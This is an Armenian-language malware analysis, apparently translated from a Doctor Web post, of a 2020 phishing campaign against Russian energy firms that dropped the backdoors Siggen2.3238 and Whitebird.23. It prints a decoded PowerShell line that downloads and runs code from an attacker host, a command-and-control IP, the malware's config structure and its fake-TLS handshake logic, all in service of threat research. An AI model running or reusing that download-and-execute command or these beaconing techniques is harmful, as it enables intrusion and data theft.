Համակարգչային անվտանգության միջադեպերի հետաքննության մեր փորձը ցույց է տալիս, որ էլ.փոստը շարունակում է մնալ հարձակվողների կողմից օգտագործվող ամենատարածված ուղիներից մեկը՝ սկզբնապես հարձակման ենթարկված ցանցային ենթակառուցվածքները ներթափանցելու համար: Կասկածելի (կամ ոչ այնքան կասկածելի) նամակով մեկ անզգույշ գործողությունը դառնում է մուտքի կետ հետագա վարակման համար, այդ իսկ պատճառով կիբերհանցագործները ակտիվորեն օգտագործում են սոցիալական ինժեներական մեթոդները, թեև տարբեր աստիճանի հաջողությամբ:
Այս գրառման մեջ մենք ցանկանում ենք խոսել ռուսական վառելիքաէներգետիկ համալիրի մի շարք ձեռնարկությունների դեմ ուղղված սպամի արշավի վերաբերյալ մեր վերջին հետաքննության մասին: Բոլոր հարձակումները կատարվեցին նույն սցենարով, օգտագործելով կեղծ նամակներ, և թվում էր, թե ոչ ոք մեծ ջանք չի գործադրել այդ նամակների տեքստային բովանդակության վրա:
Հետախուզական ծառայություն
Ամեն ինչ սկսվեց 2020 թվականի ապրիլի վերջին, երբ Doctor Web վիրուսի վերլուծաբանները հայտնաբերեցին սպամ արշավ, որում հաքերները թարմացված հեռախոսային տեղեկատու ուղարկեցին ռուսական վառելիքաէներգետիկ համալիրի մի շարք ձեռնարկությունների աշխատակիցներին: Իհարկե, սա պարզ մտահոգություն չէր, քանի որ գրացուցակը իրական չէր, և .docx փաստաթղթերը ներբեռնեցին երկու պատկեր հեռավոր ռեսուրսներից:
Դրանցից մեկը ներբեռնվել է օգտատիրոջ համակարգիչ news[.]zannews[.]com սերվերից: Հատկանշական է, որ դոմենի անվանումը նման է Ղազախստանի հակակոռուպցիոն մեդիա կենտրոնի՝ zannews[.]kz տիրույթին։ Մյուս կողմից, օգտագործված տիրույթը անմիջապես հիշեցնում էր 2015 թվականի մեկ այլ արշավ, որը հայտնի է որպես TOPNEWS, որն օգտագործում էր ICEFOG-ի հետնադուռ և ուներ տրոյական հսկողության տիրույթներ՝ իրենց անուններում «նորություններ» ենթալարիով: Մեկ այլ հետաքրքիր առանձնահատկությունն այն էր, որ տարբեր հասցեատերերի նամակներ ուղարկելիս պատկեր ներբեռնելու հարցումներն օգտագործում էին կամ տարբեր հարցումների պարամետրեր կամ եզակի պատկերների անուններ:
Մենք կարծում ենք, որ դա արվել է տեղեկատվության հավաքագրման նպատակով՝ բացահայտելու «վստահելի» հասցեատիրոջը, որն այնուհետև երաշխավորված կլինի ճիշտ ժամանակին բացել նամակը: SMB արձանագրությունն օգտագործվել է պատկերը երկրորդ սերվերից ներբեռնելու համար, որը կարելի էր անել ստացված փաստաթուղթը բացած աշխատակիցների համակարգչից NetNTLM հեշերը հավաքելու համար:
Եվ ահա ինքնին նամակը կեղծ գրացուցակով.
Այս տարվա հունիսին հաքերները սկսեցին օգտագործել նոր տիրույթի անունը՝ sports[.]manhajnews[.]com՝ նկարներ վերբեռնելու համար։ Վերլուծությունը ցույց է տվել, որ manhajnews[.]com ենթադոմեյններն օգտագործվել են սպամ նամակագրություններում առնվազն 2019 թվականի սեպտեմբերից: Այս արշավի թիրախներից մեկը ռուսական մեծ համալսարանն էր։
Նաև հունիսին հարձակման կազմակերպիչները նոր տեքստով հանդես եկան իրենց նամակների համար. այս անգամ փաստաթուղթը պարունակում էր տեղեկատվություն ոլորտի զարգացման մասին։ Նամակի տեքստում հստակ նշվում էր, որ դրա հեղինակը կա՛մ ռուսերենի մայրենի լեզվով չի տիրապետում, կա՛մ միտումնավոր իր մասին նման տպավորություն է ստեղծում։ Ցավոք, արդյունաբերության զարգացման գաղափարները, ինչպես միշտ, պարզվեցին, որ պարզապես շապիկ էին. փաստաթուղթը կրկին ներբեռնեց երկու պատկեր, մինչդեռ սերվերը փոխվեց ներբեռնման[.]inklingpaper[.]com-ի:
Հաջորդ նորամուծությունը հաջորդեց հուլիսին։ Փորձելով շրջանցել հակավիրուսային ծրագրերի կողմից վնասակար փաստաթղթերի հայտնաբերումը, հարձակվողները սկսել են օգտագործել Microsoft Word փաստաթղթերը, որոնք ծածկագրված են գաղտնաբառով: Միևնույն ժամանակ հարձակվողները որոշել են օգտագործել սոցիալական ինժեներական դասական տեխնիկա՝ պարգևատրման ծանուցում:
Բողոքի տեքստը կրկին գրվել է նույն ոճով, ինչը լրացուցիչ կասկած է առաջացրել հասցեատիրոջ մոտ։ Պատկերը ներբեռնելու սերվերը նույնպես չի փոխվել։
Նշենք, որ բոլոր դեպքերում նամակներ ուղարկելու համար օգտագործվել են mail[.]ru և yandex[.]ru տիրույթներում գրանցված էլեկտրոնային փոստարկղերը։
Հարձակում
2020 թվականի սեպտեմբերի սկզբին ժամանակն էր գործելու։ Մեր վիրուսային վերլուծաբանները գրոհների նոր ալիք են գրանցել, որոնցում հարձակվողները կրկին նամակներ են ուղարկել հեռախոսային տեղեկատուի թարմացման պատրվակով։ Այնուամենայնիվ, այս անգամ հավելվածը պարունակում էր վնասակար մակրո:
Կցված փաստաթուղթը բացելիս մակրոն ստեղծեց երկու ֆայլ.
- VBS սկրիպտ %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, որը նախատեսված էր փաթեթային ֆայլ գործարկելու համար;
- Խմբաքանակի ֆայլն ինքնին %APPDATA%configstest.bat, որը մշուշված էր:
Նրա աշխատանքի էությունը հանգում է որոշակի պարամետրերով Powershell shell-ը գործարկելուն։ Կեղևին փոխանցված պարամետրերը վերծանվում են հրամանների մեջ.
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Ինչպես հետևում է ներկայացված հրամաններից, այն տիրույթը, որտեղից ներբեռնվում է ծանրաբեռնվածությունը, կրկին քողարկվում է որպես լրատվական կայք: Մի պարզ , որի միակ խնդիրն է հրամանի և կառավարման սերվերից shellcode ստանալը և այն կատարելը։ Մենք կարողացանք բացահայտել երկու տեսակի հետնադռներ, որոնք կարող են տեղադրվել զոհի համակարգչի վրա:
BackDoor.Siggen2.3238
Առաջինն է BackDoor.Siggen2.3238 — մեր մասնագետները նախկինում չէին հանդիպել, ինչպես նաև այլ հակավիրուսային վաճառողների կողմից այս ծրագրի մասին հիշատակումներ չեն եղել։
Այս ծրագիրը C++ լեզվով գրված և 32-բիթանոց Windows օպերացիոն համակարգերով աշխատող հետնադուռ է:
BackDoor.Siggen2.3238 կարողանում է շփվել կառավարման սերվերի հետ՝ օգտագործելով երկու արձանագրություն՝ HTTP և HTTPS: Փորձարկված նմուշը օգտագործում է HTTPS արձանագրությունը: Սերվերին ուղղված հարցումներում օգտագործվում է հետևյալ User-Agent-ը.
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Այս դեպքում բոլոր հարցումները մատակարարվում են հետևյալ պարամետրերով.
%s;type=%s;length=%s;realdata=%send
որտեղ յուրաքանչյուր %s տող համապատասխանաբար փոխարինվում է հետևյալով.
- վարակված համակարգչի ID,
- ուղարկվող հարցումի տեսակը,
- տվյալների երկարությունը realdata դաշտում,
- տվյալները։
Վարակված համակարգի մասին տեղեկություններ հավաքելու փուլում ետնադուռը ստեղծում է այնպիսի տող, ինչպիսին է.
lan=%s;cmpname=%s;username=%s;version=%s;
որտեղ lan-ը վարակված համակարգչի IP հասցեն է, cmpname-ը համակարգչի անունն է, օգտվողի անունը՝ օգտվողի անունն է, տարբերակը՝ 0.0.4.03 տողը:
Այս տեղեկատվությունը sysinfo նույնացուցիչով ուղարկվում է POST հարցման միջոցով https[:]//31.214[.]157.14/log.txt հասցեում գտնվող կառավարման սերվերին: Եթե ի պատասխան BackDoor.Siggen2.3238 ստանում է HEART ազդանշանը, կապը համարվում է հաջող, և հետնախորշը սկսում է սերվերի հետ հաղորդակցության հիմնական ցիկլը:
Գործառնական սկզբունքների ավելի ամբողջական նկարագրություն BackDoor.Siggen2.3238 մեր մեջ է .
BackDoor.Whitebird.23
Երկրորդ ծրագիրը BackDoor.Whitebird backdoor-ի փոփոխությունն է, որն արդեն մեզ հայտնի է Ղազախստանում կառավարական գործակալության հետ տեղի ունեցած միջադեպից: Այս տարբերակը գրված է C++-ով և նախատեսված է ինչպես 32-բիթանոց, այնպես էլ 64-բիթանոց Windows օպերացիոն համակարգերով աշխատելու համար:
Ինչպես այս տեսակի ծրագրերի մեծ մասը, BackDoor.Whitebird.23 նախագծված է գաղտնագրված կապ հաստատելու կառավարման սերվերի հետ և վարակված համակարգչի չարտոնված կառավարում: Տեղադրվել է վտանգված համակարգում՝ օգտագործելով կաթիլ .
Մեր ուսումնասիրած նմուշը վնասակար գրադարան էր՝ երկու արտահանմամբ.
- Google Play
- Փորձարկում.
Իր աշխատանքի սկզբում այն գաղտնազերծում է կոնֆիգուրացիան, որը ամրագրված է հետևի դռան մարմնի մեջ՝ օգտագործելով XOR գործողության վրա հիմնված ալգորիթմ՝ 0x99 բայթով: Կազմաձևը նման է.
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Իր մշտական շահագործումն ապահովելու համար ետնամուտքը փոխում է դաշտում նշված արժեքը աշխատանքային ժամեր կոնֆիգուրացիաներ. Դաշտը պարունակում է 1440 բայթ, որոնք ընդունում են 0 կամ 1 արժեքները և ներկայացնում են օրվա յուրաքանչյուր ժամի յուրաքանչյուր րոպեն: Ստեղծում է առանձին շղթա յուրաքանչյուր ցանցային ինտերֆեյսի համար, որը լսում է ինտերֆեյսը և վարակված համակարգչից վստահված սերվերի վրա թույլտվության փաթեթներ է փնտրում: Երբ հայտնաբերվում է նման փաթեթ, հետնախորշը իր ցուցակում ավելացնում է տեղեկություններ պրոքսի սերվերի մասին: Բացի այդ, ստուգում է վստահված անձի առկայությունը WinAPI-ի միջոցով InternetQueryOptionW.
Ծրագիրը ստուգում է ընթացիկ րոպեն ու ժամը և համեմատում այն դաշտի տվյալների հետ աշխատանքային ժամեր կոնֆիգուրացիաներ. Եթե օրվա համապատասխան րոպեի արժեքը զրո չէ, ապա կապ է հաստատվում կառավարման սերվերի հետ։
Սերվերի հետ կապ հաստատելը նմանակում է հաճախորդի և սերվերի միջև TLS տարբերակի 1.0 արձանագրության միջոցով կապի ստեղծումը: Հետեւի դռան մարմինը պարունակում է երկու բուֆեր:
Առաջին բուֆերը պարունակում է TLS 1.0 Client Hello փաթեթը:
Երկրորդ բուֆերը պարունակում է TLS 1.0 Client Key Exchange փաթեթներ՝ 0x100 բայթ երկարությամբ, Change Cipher Spec, Encrypted Handshake Message:
«Client Hello» փաթեթ ուղարկելիս ետնադուռը Client Random դաշտում գրում է ընթացիկ ժամանակի 4 բայթ և 28 բայթ կեղծ պատահական տվյալներ՝ հաշվարկված հետևյալ կերպ.
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Ստացված փաթեթն ուղարկվում է կառավարման սերվեր: Պատասխանը (Server Hello փաթեթը) ստուգում է.
- համապատասխանություն TLS արձանագրության 1.0 տարբերակին;
- հաճախորդի կողմից նշված ժամանակի կնիքի (Պատահական տվյալների փաթեթի դաշտի առաջին 4 բայթերի) համապատասխանությունը սերվերի կողմից սահմանված ժամանակի դրոշմակնիքին.
- Հաճախորդի և սերվերի պատահական տվյալների դաշտում ժամանակի դրոշմից հետո առաջին 4 բայթերի համընկնում:
Նշված համընկնումների դեպքում backdoor-ը պատրաստում է Client Key Exchange փաթեթ: Դա անելու համար այն փոփոխում է Client Key Exchange փաթեթի հանրային բանալին, ինչպես նաև գաղտնագրման IV և կոդավորման տվյալները կոդավորված Handshake Message փաթեթում:
Այնուհետև հետևի դուռը ստանում է փաթեթը հրամանի և կառավարման սերվերից, ստուգում է, որ TLS արձանագրության տարբերակը 1.0 է, և այնուհետև ընդունում է ևս 54 բայթ (փաթեթի մարմինը): Սա ավարտում է կապի կարգավորումը:
Գործառնական սկզբունքների ավելի ամբողջական նկարագրություն BackDoor.Whitebird.23 մեր մեջ է .
Եզրակացություն և եզրակացություններ
Փաստաթղթերի, չարամիտ ծրագրերի և օգտագործվող ենթակառուցվածքի վերլուծությունը թույլ է տալիս վստահորեն ասել, որ հարձակումը նախապատրաստվել է չինական APT խմբերից մեկի կողմից։ Հաշվի առնելով հաջող հարձակման դեպքում տուժածների համակարգիչների վրա տեղադրված հետնադռների ֆունկցիոնալությունը, վարակը հանգեցնում է առնվազն հարձակման ենթարկված կազմակերպությունների համակարգիչներից գաղտնի տեղեկատվության հափշտակմանը:
Բացի այդ, շատ հավանական սցենար է տեղական սերվերների վրա մասնագիտացված տրոյականների տեղադրումը հատուկ գործառույթով: Սրանք կարող են լինել տիրույթի կարգավորիչներ, փոստի սերվերներ, ինտերնետ դարպասներ և այլն: Ինչպես տեսանք օրինակում: , նման սերվերները տարբեր պատճառներով հատուկ հետաքրքրություն են ներկայացնում հարձակվողների համար:
Source: www.habr.com